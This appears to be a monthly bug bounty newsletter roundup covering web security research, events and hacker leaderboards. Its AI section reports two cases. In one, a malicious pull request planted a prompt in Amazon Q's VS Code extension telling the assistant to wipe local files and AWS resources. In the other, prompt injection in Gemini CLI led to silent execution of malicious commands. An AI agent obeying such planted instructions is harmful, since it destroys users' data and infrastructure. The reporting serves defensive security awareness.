First up in our latest roundup is Jorian Woltjer’s bypassing of a nonce-based Content Security Policy “in a pretty realistic scenario”, accompanied by an XSS challenge demonstrating exploitation steps. His writeup’s key takeaway, the researcher suggests, is that “you can force loading [of] any page from disk cache by triggering bfcache while having a reference to the page”. 🧐
Contrary to popular opinion, the most effective HTTP smuggling exploits don’t necessarily require “complex header tricks or broken protocol parsing”, according to security researcher d3d. Instead, he writes (in a pleasingly punchy style), “a simple misalignment in expectations between front-end and back-end servers can be quietly exploited to build an undetectable channel. No special headers. No payload gymnastics”. The upshot? “A functioning C2 channel that rides through even the most hardened infrastructure.” 🔥
AI-powered self-destruct button
Back to third-party news of note, and Amazon inadvertently merged a malicious pull request injected into Amazon Q’s VS Code extension by a hacker that supposedly wanted to expose Amazon’s AI “security theater”. The sabotage embedded a prompt instructing the AI assistant to wipe both local files and AWS resources and log deletions to /tmp/CLEANER.LOG. AWS. Amazon has now removed the extension and released an updated version, claiming no customer resources were impacted due to a formatting error that prevented execution. The GitHub commit in question prompted one user to observe wryly: “That's how AI gets rid of tech debt”. The issue was covered by 404 Media (paywall) and, later, Last Week in AWS. 👀
Described by one redditor as “f!#*ing unsettling” given the scramble to integrate LLMs into modern applications, Tracebit researchers discovered an attack on Google Gemini CLI, a command-line AI workflow tool, that because of a combination of “a toxic combination of improper validation, prompt injection and misleading UX, inspecting untrusted code consistently leads to silent execution of malicious commands”. The attack foundered on “multiple layers of protections” when mounted against rival AI code tools. 🔒
Before we conclude with our own humble output, here’s some more notable recent research that we’ve spotted:
📍 Would you like an IDOR with that? Leaking 64 million McDonald’s job applications – Ian Carroll
📍 ‘Schizophrenic’ zip files: different contents depending on your archive reader – hackArcana
📍 Broken authorization in APIs: introducing Autoswagger – Daniel Andrew, head of security, Intruder
📍 Why XSS persists in this frameworks era? – by Canalun
📍 From Blind XSS to RCE: When headers became my terminal – Mahmoud El Manzalawy
Vulnerability vectors
SQL injection vulnerabilities continue to emerge and evolve despite the introduction of defences such as prepared statements and object–relational mappers (ORMs) 💉 The inaugural article of our ‘Vulnerability Vectors’ series walks you through basic and advanced SQL injection (SQLi) techniques, including blind SQLi, time-based attacks and out-of-band (OOB) callbacks. 🚀
Making the invisible visible
Are you equipped with the intel-gathering skills – such as port scanning, subdomain enumeration or HTTP fingerprinting – that you need to thrive as a hunter? 🤔 We’ve wrapped up our recon series with a recap of six articles covering walk-throughs for implementing methodologies that form the bedrock of effective vulnerability research. 💡
Whether you attended leHACK and want to relive the event or you’re curious to learn more about live Bug Bounties, you may be interested in watching highlights of our recent live hacking event from leHACK 2025 below.
Bug Bounteous
Swiss Post, Switzerland’s national postal service, is offering rewards up to €230,000 per valid report – and even medium-tier reports are pegged at €40,000! – as part of its annual Public Intrusion Test. Write-in fields are in scope for the first time. There are only two days left to run though, with the time-limited event concluding on 24 August. 🚀 🆕
Two episodes of Talkie Pwnii have materialised since the last Bug Bounty Bulletin. First,Pwnii explored advanced features and customisation for Caido, including the use of plugins QuickSSRF, AuthMatrix, YesWeCaido and Param Finder, in the concluding part of a two-part series about harnessing the web app testing tool. Then she showed how to break lxml with error-based XXE and local entities in her solution to Dojo challenge #42 (here are the best write-ups and swag winners for this challenge, entitled Hex Color Palette).The current Dojo challenge is CCTV Manager, where you are tasked with uploading malicious firmware in order to seize control of a CCTV system (active until 14 August). 📹
Alan L. (El Mago) recently dropped a deep dive on how the @YesWeHack platform works – from submitting bugs to sharpening your #BugBounty skills with Dojo! Dojo, our CTF playground, helps you hack smarter with practical labs & vuln walkthroughs, as this respected hacker and popular YouTuber explains… 💡
Four new writeups of hunter interviews to flag (on our blog; they first featured on our YouTube channel): Bug Bounty Argentina founderlemonoftroy, who recounted how he became hooked on hacking; his compatriot, g4mb4, for whom patience is one of three foremost virtues when it comes to hacking; leorac, who offered tips onkeeping your morale up when you hit an inevitable dry spell; and Polish YouTuber Gregxsunday, the brains behind the Bug Bounty Reports Explained YouTube channel and podcast. 🤩
Drak3hft7 has continued his meteoric rise up our leaderboards and stormed into first place in our third-quarter rankings – unseating the perennial and all-time #1 Rabhi. The Italian hunter, who we interviewed last year, has now climbed to an all-time position of #6, up from #10 just a month ago! Bravo. Kudos also to Swiss all-time #2 Xel in second, France-based Supr4s in fourth and Algeria-based djamel-ghorab in fifth. All-time still unassailable atop the leaderboard.
🤘Live Bug Bounty in Berlin imminent🤘
Fresh from our Black Hat USA debut, we now turn our attention to exhibiting (and in one imminent case, hosting a live Bug Bounty) at:
📍CESIN (Club des Experts de la Sécurité de l’Information et du Numérique)– Louveciennes, 29 August
📍 Nullcon Berlin – Berlin, 4-5 September. We’re hosting a live Bug Bounty event – target to be unveiled on-site!🎯
📍 INDOSEC – Jakarta, 16-17 September, booth E8
📍ROOTCON – Philippines, 24-26 September, booth G1
📍 it-sa Expo&Congress in Nuremberg / 7 - 9 October 2025
And that’s it for this month… And in fact, next month too, as henceforth we’re alternating monthly issues of the two newsletters that spawn these blog posts and the roundups aimed at CISOs. So the newsletter aimed at CISOs, security teams and security-conscious devs, CrowdSecWisdom, will be published in September, and the next Bug Bounty Bulletin will land in October. Enjoy the last of the summer! 👋
Read this monthly roundup of content aimed at ethical hackers even sooner by subscribing to Bug Bounty Bulletin.
Are you a CISO, other security professional or security-conscious dev? Check out our CISO-focused sister newsletter, CrowdSecWisdom – bringing you news, insights and inspiration around offensive security topics like Bug Bounty, vulnerability disclosure and management, pentest management and attack surface protection.